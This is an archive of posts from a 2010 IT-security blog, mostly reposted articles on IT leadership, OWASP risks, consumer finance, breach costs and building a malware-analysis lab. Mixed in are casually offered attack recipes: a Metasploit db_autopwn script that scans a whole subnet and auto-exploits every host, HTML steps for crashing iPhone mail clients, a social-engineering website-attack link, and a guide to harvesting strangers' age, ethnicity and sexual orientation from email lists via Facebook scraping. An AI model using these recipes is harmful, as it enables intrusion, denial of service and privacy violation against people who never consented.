Archive for 2010
The art of technology
…and it is an art. This is from the perspective of a technology leader seeing the changes over the last ten or so years, and is in the same thought process as the CIO write up I posted last week.
There’s more than a few non-technical hurdles we have to jump over. Consider these scenarios as a for instance.
A C level executive wants to push a project through – you as the senior IT executive cannot sign off on the release until some sanity checks are done, but the C level releases anyway.
A senior executive refuses to implement controls because it will add complexity to the project – yet the controls are required by the industry.
These aren’t insurmountable issues but are just a couple of the hoops we have to jump through. The point here isn’t to have answers to the above issues, but to show that the art (see title) is not only being a leader in the technical field, a mentor to technical staff and all the other attributes of a senior IT executive, but also to deal with the personalities of those above you – managing your managers so to speak.
Should it be this way? No, not really but it’s not a perfect world we live in. If we can’t communicate at all levels we are in the wrong job. If we can’t make these people see reason all we can do is inform them of the risk. Since it’s our neck on the line when things go awry we need to make sure all bases are covered. Even if we are right we cannot afford to make any part of the business look bad so it becomes a strategic issue, but is that really where we want to go with this, or where we need to be? If we have tried all avenues and we are still not being heard – perhaps the business isn’t ready for a senior executive in the IT leadership role. That’s a hard truth and also a tough call.
We’ve seen the IT role move from being a customer organization to a business partner, and rightfully so. Look how long it took to do that. In the age of ever advancing technology does everyone realize that the business will not function without IT? That’s a rhetorical question but the excuse of not knowing what IT does isn’t going to cut it anymore. Should we explain the complexity of our environment to everyone, or should we be seen as the enabling business partner that drives the business forward from the proper use of technology?
This isn’t a rant by the way. It’s attempting to realize something that I have been working with for a long time. IT has value to the business and is a business partner. We know IT is not revenue generating but we should not be seen as a drain on assets, or a department that spends for the sake of spending. We have to trust that our IT executives know what they are doing, just as you would trust a CEO or COO that they know what they are doing, and accept that you cannot know all about everything that we do. (yes, I meant to write that sentence that way!). Superseding and second guessing our world is not going to help the business, in fact more often than not it will hurt the business.
As with everything there are many points of view pertaining to this topic. I’ve read many on the CIO forums and LinkedIn noticeboards, and I’ve heard many when speaking at conferences and attending seminars. But what I feel the most is, we as leaders can say the words “they don’t understand”. If that is where we leave it we don’t deserve to be leaders. We have to stand up and bridge the gap. For example, in the role of information security some say “the execs will get it when we get hacked, then we’ll get the money”. That’s a little too late for my liking. In that case I will take drastic measures to protect the business, that might include hacking the company myself. I would rather it be me that breaches the company than a hacker, and if done correctly it will have the desired effect. That will also add to your credence as a leader and more trust will start to flow. That being said there is a chance it could backfire. Not everyone can accept a direct approach like that.
I can go around in circles on this one, but I’ll leave it here for now. This isn’t meant as a blue print or guideline. It is meant to provoke thought and point of view and I fully understand that there are those that will push back hard – and that is good too. Care to share your thoughts? I’d love to hear them.
WPA is hackable?
I attended a track at Blackhat last week whereby WPA can be hacked by using WEP. I know, it sounds quite ‘out there’ but it’s true. The good thing is this can only be done if WPA migration mode is still enabled. So, if you’ve done WPA migration recently, or even just to check to make sure – turn off WPA migration mode and you should be good to go.
Here’s a link to Core Labs presentation: WPA Migration Mode: WEP is back to haunt you…
OWASP Top Ten
From the OWASP website – I thought it was pertinent to post the OWASP top ten. We all know what they are but there is some great information wrapped in the description. For the full write up and a lot more useful information visit the OWASP website HERE.
The OWASP Top 10 Web Application Security Risks for 2010 are:
–Code Injection
–Cross-Site Scripting (XSS)
–Broken Authentication and Session Management
–Insecure Direct Object References
–Cross-Site Request Forgery (CSRF)
–Security Mis-configuration
–Insecure Cryptographic Storage
–Failure to Restrict URL Access
–Insufficient Transport Layer Protection
–Un-validated Redirects and Forwards
The full descriptions are well worth reading, and further down the page there are “factors” broken out into four headings. Again, there is more information on the OWASP website, but look at the four headings below. This is a really easy way to help you classify the severity of potential threats, and to help you asses your assumption of risk.
Threat factors – skill level, motive, opportunity, size
Vulnerability factors – ease of discovery, ease of exploit, awareness, IDS
Technical impact factors – loss of confidentiality, integrity, availability, accountability
Business impact factors – financial damage, reputation, non-compliance, privacy violation
…worth sharing I thought!
American Express Security – FAIL!
I came upon this from a twitter post – check it out! American Express have an insecure web form. They actually ask you to click on a link if you want a secure web form. Wow – talk about conflict of interest. Consider the stringent PCI requirements that Amex put corporations under, with some pretty expensive repercussions if you don’t comply, and they have an insecure web form. I’m flabbergasted!
See for yourself HERE!
8 Phony ‘Bargains’ and Better Alternatives
I saw this on Yahoo Finance, provided by CBSMoneywatch.com and written by by Caroline E. Mayer, and thought it deserved a repost. It’s confusing enough to think about credit reports etc - below are good guidelines to follow.
Big discounts! Big sales! Big freebies! Enticing deals abound, but you need to distinguish those from the raw deals masquerading as bargains. Many of them come with so many strings attached that they could cost you plenty. (Those frequent-flier rewards cards, for example? They often cost you a bundle — and the airline miles are often more restrictive and harder to use than what you’d get from a cash-back credit card.)
For consumers, a little homework goes a long way. Here are eight would-be deals to steer clear of, as well as our suggestions for better options.
1. Unlimited Long Distance
Many telephone plans bundle “free” unlimited long-distance service with local calling service. If you don’t make a lot of long-distance calls — or if you make a lot of them from your cell phone — these plans may not be cost effective. A bundled plan typically costs about $20 more than a local plan, but the average American consumer makes fewer than two hours of long-distance phone calls a month, according to the Federal Communications Commission. That’s about 17 cents per minute.
Better Deal: Skip the extra fees, and buy your long-distance service from a reseller such as ECG or Pioneer Telephone. These companies buy their long-distance service wholesale from the larger telecommunications firms but offer the same general quality for far lower prices, billing by the minute or fraction thereof. (ECG charges 2.5 cents a minute for interstate phone calls; Pioneer’s price is 2.7 cents.)
Alternately, sign up for a voice over Internet protocol (VoIP) plan from a carrier like Vonage, whose plans start at $15 a month (climbing to $26 after a six-month trial) for both local and long distance. Calls travel over the Internet, though, so you need a stable, active cable or DSL Internet connection for this to work.
2. Frequent-Flier Rewards Cards
Credit card rewards tied to airline miles or gift points were the earliest players in the sector, but it’s time to dump them. For one thing, the benefits have shrunk, particularly on airlines: They’ve increased the number of miles needed for a free flight; reduced flight schedules, making free seats harder to find; and, in some cases, imposed a booking fee on rewards flights.
On certain rewards cards, annual fees may also outweigh the benefits. The perks-laden American Express Platinum, which costs $450 a year, offers a complimentary airline ticket for every first- or business-class fare purchased on select international flights, plus a business-class fare purchased on plus a concierge service, free access to airport lounges, and other bonuses. It all sounds great, especially if you are booking lots of international business-class travel. But if not, you just paid $450 to have someone else make your restaurant reservations.
Better Deal: Try cash-reward cards instead. Airline miles and gifts are fine, but if you have the cash in your wallet, you can make your own purchasing decisions. Peter Flur of Credit Card Goodies, a 10-year-old Web site that monitors rewards cards, recommends Blue Cash from American Express, which offers up to 5 percent cash back on purchases at gas, groceries, and drugstores, as well as 1.25 percent on all other purchases once a cardholder rings up $6,500 in purchases any given year.
3. Checking Accounts That Pay Interest
Interest-bearing checking accounts at traditional brick-and-mortar banks often pay only 0.13 percent interest but require high minimums to avoid a monthly maintenance fee. On, for instance, a deposit of $3,400 — the average minimum required to avoid monthly fees, according to Bankrate.com data — that amounts to just $4.42 in annual interest.
Better Deal: In this low-interest environment, forget about getting any interest from your checking account, advises Richard Barrington, an analyst with MoneyRates.com. Instead, look for a no-fee checking account — and “be sure to check the minimum balance requirement,” Barrington says. “These minimums have been rising, so make sure it’s a minimum balance you can realistically maintain.”
Meanwhile, if you have extra cash, shop around for banks and credit unions that offer good deals. Mike Moebs, an economist whose firm surveys bank fees says there are a few banks and credit unions that combine checking and money-market deposit accounts into one, offering a high rate on balances over $2,500.
4. Overdraft Protection
Many banks used to offer it automatically when you opened an account, making it sound like a valuable safeguard. After all, if you bounced a check or tried to withdraw more cash from the ATM than you had in your account, you wouldn’t suffer any embarrassment when the bank refused to process a transaction.
But consumer advocates long argued that overdraft protection was just a way for banks to earn money at your expense, charging $20 to $35 per overdraft — a substantial penalty, considering the typical transaction prompting the overdraft fee is $20. That’s why the government has ordered new rules to take effect this summer that will require banks to get your approval before enrolling you in overdraft protection.
Better Deal: If you want back-up protection without the overdraft fees, consider setting up a savings account linked to your checking account so funds can be transferred in case of an overdraft. There may still be a fee to transfer funds between accounts, but it’s typically lower — only $10.
Meanwhile, keep a careful tab on your bank account balance: If you opt out of overdraft protection and then make an ATM or debit-card transaction that exceeds your balance, your transaction could be denied.
5. Extended-Warranty Protection
Don’t buy additional warranty coverage for electronics and major appliances. For one thing, some repairs are already covered by the standard manufacturer warranty. And Consumer Reports’ researchers have found that products seldom break within the extended-warranty window — and that when electronics and appliances do break, average repair costs are about as much as an extended warranty.
Better Deal: Check the fine print on your existing Visa, MasterCard or American Express. Many of these cards, particularly if they are platinum or gold, will extend the warranty for a year. “It’s one of the greatest freebies from credit card companies ever,” says Edgar Dworsky, a consumer lawyer and founder of the Consumer World Web site. The warranty protection varies, so review the policies on your existing cards before you make a purchase — then use the one offering the best warranty protection.
6. Going-Out-of-Business Sales
They don’t offer the bargains you’d expect — at least at the outset, when the promoted discounts are usually off the full retail price. That “30 percent off” sale may not be any better than the deals you could get before the liquidation process started. In some cases, you may actually be better off buying from a rival store that is trying to compete with the bankrupt retailer — and will be around to take care of any problems after the liquidating store is out of business.
Better Deal: Shopping robots, such as PriceGrabber.com and Shopping.com, are good places to comparison shop and may be particularly useful before visiting any liquidation sale, says Dworsky. One of his favorite sites, PriceSpider.com, posts historical prices; the range of prices should help you determine whether the price is likely to hold or continue to drop.
7. Paying for a Credit Report
Despite its name, FreeCreditReport.com is not gratis. Here’s what the fine print really says: Order your free report and you get a seven-day free trial membership in a credit-monitoring service. If you don’t cancel within seven days, you’ll be billed $14.95 a month until you bail out. Be wary of other sites making similar come-ons.
Better Deal:Visit AnnualCreditReport.com instead — the government-approved Web site where you can get a free credit report from each of the three major credit bureaus once a year. It won’t give you your actual credit score, but most people don’t need it. (The exception: If you’re actively shopping for a loan right now, go to myFICO.com to get your current score — and a report from Equifax or TransUnion — for $16.)
If you’re merely curious about how lenders perceive your credit record, you can get a good estimate of your credit score for free at CreditKarma.com. You can also try the credit score estimator at Credit.com; you will probably need your actual credit report to answer some of the site’s key questions, such as the age of your oldest credit account and the number of outstanding loans and credit cards.
8. Fraud Alerts
Don’t pay for identity-theft-protection services that automatically put fraud alerts on your credit report. You can do that yourself; it’s easy — and free. But be careful: Don’t put a fraud alert on your credit report as a general matter, because that means you can’t easily open new accounts. You should use fraud alerts only if you’ve had your wallet stolen or something else has happened to put you at real risk.
Better Deal: Review your monthly credit card and bank statements regularly to make sure there are no unauthorized charges. Also, don’t forget to obtain a copy of your free credit report annually from each of the three major credit bureaus — using AnnualCreditReport.com, of course.
10 Amazing Life Lessons You Can Learn From Albert Einstein
Albert Einstein has long been considered a genius by the masses. He was a theoretical physicist, philosopher, author, and is perhaps the most influential scientists to ever live.
Einstein has made great contributions to the scientific world, including the theory of relativity, the founding of relativistic cosmology, the prediction of the deflection of light by gravity, the quantum theory of atomic motion in solids, the zero-point energy concept, and the quantum theory of a monatomic gas which predicted Bose–Einstein condensation, to name a few of his scientific contributions.
Einstein received the 1921 Nobel Prize in Physics “for his services to Theoretical Physics, and especially for his discovery of the law of the photoelectric effect.”
He’s published more than 300 scientific works and over 150 non-scientific works. Einstein is considered the father of modern physics and is probably the most successful scientist there ever was.
10 Amazing Lessons from Albert Einstein:
1. Follow Your Curiosity
“I have no special talent. I am only passionately curious.”
What piques your curiosity? I am curious as to what causes one person to succeed while another person fails; this is why I’ve spent years studying success. What are you most curious about? The pursuit of your curiosity is the secret to your success.
2. Perseverance is Priceless
“It's not that I'm so smart; it's just that I stay with problems longer.”
Through perseverance the turtle reached the ark. Are you willing to persevere until you get to your intended destination? They say the entire value of the postage stamp consist in its ability to stick to something until it gets there. Be like the postage stamp; finish the race that you’ve started!
3. Focus on the Present
“Any man who can drive safely while kissing a pretty girl is simply not giving the kiss the attention it deserves.”
My father always says you cannot ride two horses at the same time. I like to say, you can do anything, but not everything. Learn to be present where you are; give your all to whatever you’re currently doing.
Focused energy is power, and it’s the difference between success and failure.
4. The Imagination is Powerful
“Imagination is everything. It is the preview of life's coming attractions. Imagination is more important than knowledge.”
Are you using your imagination daily? Einstein said the imagination is more important than knowledge! Your imagination pre-plays your future. Einstein went on to say, “The true sign of intelligence is not knowledge, but imagination.” Are you exercising your “imagination muscles” daily, don’t let something as powerful as your imagination lie dormant.
5. Make Mistakes
“A person who never made a mistake never tried anything new.”
Never be afraid of making a mistake. A mistake is not a failure. Mistakes can make you better, smarter and faster, if you utilize them properly. Discover the power of making mistakes. I’ve said this before, and I’ll say it again, if you want to succeed, triple the amount of mistakes that you make.
6. Live in the Moment
“I never think of the future - it comes soon enough.”
The only way to properly address your future is to be as present as possible “in the present.”
You cannot “presently” change yesterday or tomorrow, so it’s of supreme importance that you dedicate all of your efforts to “right now.” It’s the only time that matters, it’s the only time there is.
7. Create Value
“Strive not to be a success, but rather to be of value."
Don’t waste your time trying to be successful, spend your time creating value. If you’re valuable, then you will attract success.
Discover the talents and gifts that you possess, learn how to offer those talents and gifts in a way that most benefits others.
Labor to be valuable and success will chase you down.
8. Don’t Expect Different Results
“Insanity: doing the same thing over and over again and expecting different results.”
You can’t keep doing the same thing everyday and expect different results. In other words, you can’t keep doing the same workout routine and expect to look differently. In order for your life to change, you must change, to the degree that you change your actions and your thinking is to the degree that your life will change.
9. Knowledge Comes From Experience
“Information is not knowledge. The only source of knowledge is experience.”
Knowledge comes from experience. You can discuss a task, but discussion will only give you a philosophical understanding of it; you must experience the task first hand to “know it.” What’s the lesson? Get experience! Don’t spend your time hiding behind speculative information, go out there and do it, and you will have gained priceless knowledge.
10. Learn the Rules and Then Play Better
“You have to learn the rules of the game. And then you have to play better than anyone else.”
To put it all in simple terms, there are two things that you must do. The first thing you must do is to learn the rules of the game that you’re playing. It doesn’t sound exciting, but it’s vital. Secondly, you must commit to play the game better than anyone else. If you can do these two things, success will be yours!
Thank you for reading and be sure to pass this article along!
Social Engineer Toolkit – Website Attack How To
I found this while wandering about the web. Be careful – it works!
Social Engineering Toolkit – Website Attack How To
As with all things “hack” – be careful how you proceed. The opportunity to hack is always there – the ability to show constraint and remain ethical is a necessity! ‘Nuff said.
Enjoy.
A db_autopwn script run from msfconsole
Here’s a handy script I found on the web, written by HD Moore himself. It works like a charm!
$ vim ownitall.rc
db_create /tmp/mynet.db
db_nmap -sS -F -n 192.168.0.0/24 -T5
setg AutoRunScript scraper
db_autopwn -t -e -p -r
$ msfconsole -r ownitall.rc
Have fun with it.
How to Reliably Crash the iPhone’s E-mail Client
From https://secure.grepular.com/ by by Mike Cardwell
I have tested the following on two separate iPhones and it caused crashes on them both. I don’t have an iPhone of my own to test with, so I’m not able to investigate this much further.
1.) Create a blank file named anything.txt and then upload it to some webspace. It needs to be completely blank… 0 bytes. It must be served as text/plain. At least, “text/plain” is the only content type I know for sure it works with as I didn’t try any others.
2.) Send an HTML email to an email account that the iPhone can access. The HTML email must contain a meta refresh tag to the file which you have just created. Example:
<head>
<meta http-equiv="Refresh" content="1; URL=http://EXAMPLE/anything.txt"/>
</head>
3.) Open the email on an iPhone.
The iPhone email client actually honours the meta refresh and attempts to load the URL. It then proceeds to crash. Next time you open the email client it will have to re-sync all of the email.
This information comes with no warranty. Use it only for good, and only on your own phone.
CISOs Keep Breach Costs Lower
The latest “Cost of a Data Breach” survey from the Ponemon Institute finds companies with a CISO are better able to handle loss of sensitive information
By Joan Goodchild, Senior Editor
Companies continue to pay a high price to clean up the mess created by a data breach, but having a Chief Information Security Officer (CISO) may offer some protection. That is the conclusion of a study released Monday by the Ponemon Institute, a Michigan-based consultancy that conducts independent research on privacy, data protection and information security policy.
This is the fifth year Ponemon has conducted its “Cost of a Data Breach” survey, which examined actual data breach experiences of 45 U.S. companies from 15 different industry sectors. This year, the cost of a data breach has increased to $204 from last year’s $202 per customer record. However, companies that had a CISO (or equivalent title) who managed the data breach incident experienced an average per capita cost of $157 versus $236 for companies without such CISO leadership.
Approximately 40 percent of participating companies had a CISO in charge of managing the data breach incident, according to the survey.
“While other functional areas are typically involved in crisis management activities surrounding the data breach, our results suggest CISO leadership substantially reduces the overall cost of data breach,” the report states.
“The one big take away on positive takeaway is that in (companies) that have CISO involvement, breaches tend to cost less because they have a more strategic view of protecting data than the old idea of whack-a mole, fix-it a hundred different times, ” explained Phillip Dunkelberger, president and CEO of PGP Corp., which co-sponsored the study. “CISO involvement at a higher level means less cost of a data breach and less chance of repeating it because of the strategic view of protecting it that these professional take.”
While the cost of a breach only rose two dollars per record this year, Dr. Larry Ponemon, founder and chair of the Ponemon Institute, pointed out the massive increase in cost over the five years since the study’s inception, when breaches cost $138 per compromised customer record. In figuring out the costs, the study takes into account a wide range of business costs, including expense outlays for detection, escalation, notification, and after the fact (ex-post) response. The economic impact of lost or diminished customer trust and confidence, measured by customer churn or turnover rates, is also analyzed.
Other highlights from this year’s research include:
- Forty two percent of all cases in this year’s study involved third-party mistakes or flubs. Data breaches involving outsourced data to third parties, especially when the third party is offshore, are most costly. The per capita cost for data breaches involving third parties is $217 versus $194, more than a $21 difference, according to Ponemon.
-Twenty four percent of all cases in this year’s study involved a malicious or criminal attack that resulted in the loss or theft of personal information. Research shows data breaches involving malicious or criminal acts are much more expensive than incidents resulting from negligence. The per capita cost of a data breach involving a malicious or criminal act averages $215. The per capita cost of a data breach involving a negligent insider or a systems glitch averages $154 and $166, respectively.
-Thirty six percent of all cases in this year’s study involved lost or stolen laptop computers or other mobile data-bearing devices. Data breaches concerning lost, missing or stolen laptop computers are more expensive than other incidents. Specifically, in this year’s study the per victim cost for a data breach involving a lost or stolen laptop is $225.
“Its not just about bad guys, but also good guys who make mistakes,” noted Ponemon.
Companies on IT Security Spending: Where’s the ROI?
Companies have spent millions to bolster their IT security in recent years. But some are starting to wonder if it’s been worth it, according to the 2010 Cyber Security Watch survey CSO conducted with the U.S. Secret Service, Carnegie Mellon University CERT and Deloitte & Touche.
By Bill Brenner, Senior Editor, CSO Online
Companies have spent many millions of dollars to build defenses around their IT assets this past decade, motivated by malware attacks, data security breaches and the resulting regulatory compliance cattle prod.
But the bad guys are still a few steps ahead in terms of sophistication and speed and some wonder if their investments were all for nothing, according to the newly-released 2010 Cyber Security Watch Survey.
More than 500 respondents, including business and government executives, professionals and consultants, participated in the survey, conducted by CSO Magazine with help from the U.S. Secret Service, Carnegie Mellon Software Engineering Institute (CERT) and Deloitte’s Center for Security and Privacy Solutions. Though respondents point to sizable efforts to keep their companies secure, many admit it’s getting almost impossible to outpace the bad guys.
Also see Network Security: The Basics
“Security confidence seems to be waning. Respondents are spending more money and implementing new capabilities, but overall they seem to be unsure about how truly effective their efforts really are toward ensuring security,” said Ted DeZabala, principal at Deloitte & Touche LLP and U.S. leader of Deloitte’s Security & Privacy services.
The survey showed a drop in cybercrime victims — 60 percent this year compared to 66 percent in 2007. But the affected organizations have experienced significantly more attacks than in previous years, fueling doubts over a lack of return-on-investments (ROI).
Between August 2008 and July 2009 more than a third (37 percent) of respondents experienced an increase in cybercrimes compared to the previous year. While outsiders (non-employees or contractors) are the main culprits of cybercrime in general, the most costly or damaging attacks are more often caused by insiders (employees or contractors). One quarter of all cybercrime attacks were committed by an unknown source.
Although the number of incidents rose, the ramifications have not been as severe. Since 2007, when the last cybercrime survey was conducted, the average monetary value of losses resulting from cybercrimes declined by 10 percent. This can likely be attributed to an increase in both IT security spending (42 percent) and corporate/physical security spending (86 percent) over the past two years.
And yet, as technology advances, so do the attack methods, and many respondents worry that the bad guys are still winning. Outsiders invade organizations with viruses, worms or other malicious code; phishing; and spyware, while insiders most commonly expose private or sensitive information unintentionally, gain unauthorized access to/use of information systems or networks, and steal intellectual property.
The survey finds that insiders most often use their laptops or copy information to mobile devices as a means to commit electronic crimes against their organization. Respondents suggested data is often downloaded to home computers or sent outside the business via e-mail. This may lead to damaged reputations and may put organizations in violation of state or federal data protection laws.
More than half of the respondents — 58 percent — do believe they are more prepared to prevent, detect, respond to or recover from a cybercrime incident compared to the previous year. But only 56 percent have a plan for reporting and responding to an incident.
The research also indicated that businesses are trying to take steps to identify insider threats. Nearly one-third (32 percent) now monitor the online activities of employees who may be disgruntled or who have turned in their resignations.
Dawn Cappelli, technical manager for the Threat and Incident Management division of the Software Engineering Institute CERT Program, said insider attacks continue to be seen as a bigger problem than anything that might come from the outside.
“Attacks are more costly than outside attacks, and seven of the top eight practices that were indicated as being most effective at prevention, detection and deterrence apply to employees,” she said.
Though many respondents may be doubting the ROI of their security investments, the activity to deal with the insider threat at least indicates that no one is thinking about tightening up on their spending. Perhaps that’s because many feel like they have no choice but to keep spending, lest they fall even further behind the bad guys.
“This looks like good news — they have found effective practices for handling the most costly threats,” Cappelli said. “However, the technical solutions for insider threat mitigation were ranked alarmingly low: DLP, Ranked 9th least effective and change control/configuration management systems, ranked 5th least effective. In addition, account audits are only being performed by 43 percent of respondents, probably because of the technology gap.
To that end, her parting advice is not to the respondents, but to the vendor community: Come up with something better to help customers achieve the DLP and change control/configuration management they need.
Your 5-Step Malware-Analysis Toolkit
From http://www.campustechnology.com By Lenny Zeltser
A LARGE NUMBER of computer intrusions involve some form of malicious software (malware), which finds its way to the victim’s workstation or to a server. When investigating the incident, the IT responder typically seeks to answer questions such as: What actions can the malware specimen perform on the system? How does it spread? How, if at all, does it maintain contact with the attacker? These questions can all be answered by analyzing the offending malware in a controlled environment.
A simple analysis toolkit, built from free and readily available software, can help you and your IT team develop the skills critical to responding to today’s security incidents. The steps below will help get you started. We’ll focus on malware analysis in a Windows environment, since that platform is particularly popular among malware authors.
Step 1: Allocate physical or virtual systems for the analysis lab
A common approach to examining malicious software involves infecting a system with the malware specimen and then using the appropriate monitoring tools to observe how it behaves. This requires a laboratory system you can infect without affecting your production environment.
The most popular and flexible way to set up such a lab system involves virtualization software, which allows you to use a single physical computer for hosting multiple virtual systems, each running a potentially different operating system. Free virtualization software options include:
Running multiple virtual systems simultaneously on a single physical computer is useful for analyzing malware that seeks to interact with other systems, perhaps for leaking data, obtaining instructions from the attacker, or upgrading itself. Virtualization makes it easy to set up and use such systems without procuring numerous physical boxes.
Another useful feature of many virtualization tools is the ability to take instantaneous snapshots of the laboratory system. This way, you can record the state of the system before you infect it, and revert to the pristine environment with a click of a button at the end of your analysis.
If using virtualization software, install as much RAM into the physical system as you can, as the availability of memory is arguably the most important performance factor for virtualization tools. In addition, having a large hard drive will allow you to host many virtual machines, whose virtual file systems typically are stored as files on the physical system’s hard drive.
Take precautions to isolate the malware-analysis lab from the production network, to mitigate the risk that a malicious program will escape.
Because malware may detect that it’s running in a virtualized environment, some analysts prefer to rely on physical, rather than virtual, machines for implementing laboratory systems. Your old and unused PCs or servers can make excellent systems for your malware-analysis lab, which usually doesn’t need high-performing CPUs or highly redundant hardware components.
To allow malware to reach its full potential in the lab, laboratory systems typically are networked with each other. This helps you observe the malicious program’s network interactions. If using physical systems, you can connect them with each other using an inexpensive hub or a switch.
Step 2: Isolate laboratory systems from the production environment
You must take precautions to isolate the malware-analysis lab from the production network, to mitigate the risk that a malicious program will escape. You can separate the laboratory network from production using a firewall. Better yet, don’t connect laboratory and production networks at all, to avoid firewall configuration issues that might allow malware to bypass filtering restrictions.
If your laboratory network is strongly isolated, you can use removable media to bring tools and malware into the lab. It’s best to use write-once media, such as CDs, to prevent malicious software from escaping the lab’s confines by writing itself to a USB key. If using a USB key, which is more convenient than a CD, get a model that includes a physical write-protect switch.
Some malware-analysis scenarios benefit from the lab being connected to the internet. Avoid using the production network for such connectivity. If possible, provision a separate, and usually inexpensive, internet connection, perhaps by dedicating a DSL line to this purpose. Avoid keeping the lab connected to the internet all the time to minimize the chance of malware in your lab attacking someone else’s system on the internet.
If virtualizing your lab, be sure to keep up with security patches released by the virtualization-software vendor. Such software may have vulnerabilities that could allow malware to escape from the virtual system you infected and onto the physical host. Furthermore, don’t use the physical machine that’s hosting your virtualized lab for any other purpose.
Step 3: Install behavioral analysis tools
Before you’re ready to infect your laboratory system with the malware specimen, you need to install and activate the appropriate monitoring tools. Free utilities that will let you observe how Windows malware interacts with its environment include:
- File system and registry monitoring: Process Monitor and Capture BAT offer a powerful way to observe in
real time how local processes read, write, or delete
registry entries and files. These tools can help you
understand how malware attempts to embed into the
system upon infection. - Process monitoring: Process Explorer and Process Hacker replace the built-in Windows Task Manager, helping
you observe malicious processes, including local network
ports they may attempt to open. - Network monitoring:Wireshark and SmartSniff are
network sniffers, which can observe laboratory network
traffic for malicious communication attempts, such as
DNS resolution requests, bot traffic, or downloads. - Change detection: Regshot is a lightweight tool for comparing the system’s
state before and after the infection, to highlight
the key changes malware made to the file system and
the registry.
Behavioral monitoring tools can give you a sense for the key capabilities of malicious software. For further details about its characteristics, you may need to roll up your sleeves and perform some code analysis.
Step 4: Install code-analysis tools
Examining the code that comprises the specimen helps uncover characteristics that may be difficult to obtain through behavioral analysis. In the case of a malicious executable, you rarely will have the luxury of access to the source code from which it was created. Fortunately, the following free tools can help you reverse compiled Windows executables:
- Disassembler and debugger: OllyDbg and IDA Pro Freeware can parse compiled Windows
executables and, acting as disassemblers, display their
code as Intel x86 assembly instructions. These tools
also have debugging capabilities, which allow you to
execute the most interesting parts of the malicious program
slowly and under highly controlled conditions, so
you can better understand the purpose of the code. - Memory dumper: LordPE and OllyDump help obtain protected code located in the
lab system’s memory and dump it to a file. This technique
is particularly useful when analyzing packed executables,
which are difficult to disassemble because
they encode or encrypt their instructions, extracting
them into RAM only during run-time.
Step 5: Utilize online analysis tools
To round off your malware-analysis toolkit, add to it some freely available online tools that may assist with the reverse engineering process. One category of such tools performs automated behavioral analysis of the executables you supply. These applications look similar at first glance, but use different technologies on the back end. Consider submitting your malware specimen to several of these sites; depending on the specimen, some sites will be more effective than others. Such tools include:
Another set of potentially useful online tools provides details about websites that are suspected of hosting malicious code. Some of these tools examine the sites you specify in real time; others provide historical information. Consider submitting a suspicious URL to several of these sites, because each may offer a slightly different perspective on the website in question:
- Real-time threat assessment: Finjan URL Analysis, McAfee Site
Advisor, and Wepawet - Historical reputation data: Norton Safe Web
and WOT (Web of Trust)
Next Steps
With your initial toolkit assembled, start experimenting in the lab with malware you come across on the web, in your e-mail box, on your systems, and so on. You may find this one-page cheat sheet convenient.
Begin analysis with the tools and approaches most familiar to you. Then, as you become more familiar with the inner workings of the malware specimen, venture out of your comfort zone to try other tools and techniques. The tools I’ve listed within each step operate virtually identically. Since they’re all free, you should feel free to try them all. You’ll find that one tool will work better than another, depending on the situation. And with time, patience, and practice, you will learn to turn malware inside out.
How to convert email addresses into name, age, ethnicity, sexual orientation
From: http://maxklein.posterous.com/
So you have somehow begged, borrowed or stolen an email list of 1000 users who you believe are interested in your new service. Would it not be great if you could somehow convert that list into real people, with real photos, and perhaps even more concrete information like “My service has a higher than average gay consumer group” or “My dating service seems to be very popular among 9 year old girls”? Such information can help you correct course before you are too invested in a particular idea you have.
Well, a few weeks back, we were handed down this lovely present by our masters from above: Facebook. Save your email list as a CSV file (just comma separate those email addresses). Upload this file to your facebook account as if you wanted to add them as friends. Voila, facebook will give you all the profiles of all those users (in my test, about 80% of my email lists have facebook profiles). Now, click through each profile, and because of the new default facebook settings, which makes all information public, about 95% of the user info is available for you to harvest.
If your email list is too large, then use the very same CSV file and upload it to mechanical turk (a list of 10.000 would cost you about $10), and ask the mechanical turk guys to gather this information for you.
After you have all the demographic information you want, try to do good with it. My personal advice to facebook users: Switch on your privacy settings, make your friendslist private. Business want this information, and facebook has given it to them.
Update (from a reddit comment): Use this URL http://www.facebook.com/search/?ref=ffs&q=name@domain.com&o=2048&init=ffs and screenscrape for even more spammy goodness.
